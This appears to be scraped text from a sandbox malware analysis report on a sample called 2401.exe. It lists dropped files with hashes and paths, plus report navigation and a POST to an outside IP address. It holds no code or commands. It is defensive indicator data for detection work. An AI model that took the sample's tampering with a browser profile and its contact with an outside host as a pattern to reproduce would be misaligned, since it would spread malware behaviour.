  %APPDATA%\Mozilla\Firefox\Profiles\a0u7kz53.default-1460755681908\prefs.js
  
  Size
  5.1KiB (5230 bytes)
  
  Type
  ASCII text, with very long lines, with CRLF line terminators
  
  Runtime Process
  explorer.exe (PID: 1948)
  
  MD5
  2933b625fb800a79a5a087788cfe0c35
  
  SHA1
  1b25c40b9a173c0b9db1d0a26d25755c66c7c499
  
  SHA256
  a9c68b0c90c703bb7b619a6f63a481dbe7d6323d8937749d8bcb692d86ab04a8
- 28E3.bat
  
  Download Disabled
  
  Filepath
  %TEMP%\2EC6\28E3.bat
  
  Size
  108B (108 bytes)
  
  Type
  ASCII text, with CRLF line terminators
  
  Runtime Process
  2401.exe (PID: 2356)
  
  MD5
  62122420659d82b51f642e7fbc686d04
  
  SHA1
  56d2d4f007ab5c10ae9f3e10e716558b9292629d
  
  SHA256
  263675c9b19ffaa36a4131b5550543df980b1fe76113f374cb6caca3349e1c92
- 9087.bin
  
  Download Disabled
  
  Filepath
  %TEMP%\9087.bin
  
  Size
  225B (225 bytes)
  
  Type
  Zip archive data, at least v2.0 to extract
  
  Runtime Process
  explorer.exe (PID: 1948)
  
  MD5
  02ca5699b256b4947b0539a815623b98
  
  SHA1
  89710902ed2fa489bb506c61f5e4f3585b420a30
  
  SHA256
  36e7bb489a83610b242b0bf4009ae52098f56e46431f179d3761ab558fff0a93
- B896.bin
  
  Download Disabled
  
  Size
  22B (22 bytes)
  
  Type
  Zip archive data (empty)
  
  MD5
  76cdb2bad9582d23c1f6f4d868218d6c
  
  SHA1
  b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
  
  SHA256
  8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

2401.exe

Incident Response

Risk Assessment

Platform Intelligence

Submission Context

Indicators

Malicious Indicators 8

Suspicious Indicators 25

Informative 16

File Details

2401.exe

Resources

Visualization

Version Info

Classification (TrID)

File Sections

File Imports

Screenshots

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Emerging Threats

Extracted Strings

Extracted Files

Informative Selection 1

adprtext.exe

Informative 5

01D276F955CEADB00B

prefs.js

28E3.bat

9087.bin

B896.bin

Notifications

Runtime

Community

Antelox commented 10 hours ago updated moment ago

2401.exe

Incident Response

Risk Assessment

Platform Intelligence

Submission Context

Indicators

Malicious Indicators 8

Suspicious Indicators 25

Informative 16

File Details

2401.exe

Resources

Visualization

Version Info

Classification (TrID)

File Sections

File Imports

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Details for POST to 77.91.144.64:80

Emerging Threats

Extracted Strings

Extracted Files

Informative Selection 1

adprtext.exe

Informative 5

01D276F955CEADB00B

prefs.js

28E3.bat

9087.bin

B896.bin

Notifications

Runtime

Community

Antelox commented 10 hours ago updated moment ago

Confirm delete sample

Share link to this report by E-Mail

Confirm delete comment

Reanalyze sample - analysis options